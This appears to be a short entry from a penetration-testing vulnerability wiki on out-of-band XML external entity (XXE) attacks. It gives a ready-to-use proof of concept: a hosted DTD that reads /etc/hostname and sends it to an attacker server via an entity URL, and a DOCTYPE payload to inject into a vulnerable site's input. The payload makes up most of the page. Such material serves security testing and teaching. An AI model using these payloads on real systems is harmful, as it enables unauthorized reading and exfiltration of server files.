Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

OOB (Out of Band) XXE

POC

Create a payload.dtd file with the following content and host it on your server. <!ENTITY % file SYSTEM "file:///etc/hostname"><!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http:///?x=%file;'>">%eval;

In the vulnerable website, add the following to the input area: <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http:///payload.dtd"> %xxe;]>

Then check the web server access logs. Firstly, the XML parser will load the dtd file and then it will leak the hostname to the attacker:

Impact

High

Likelihood

High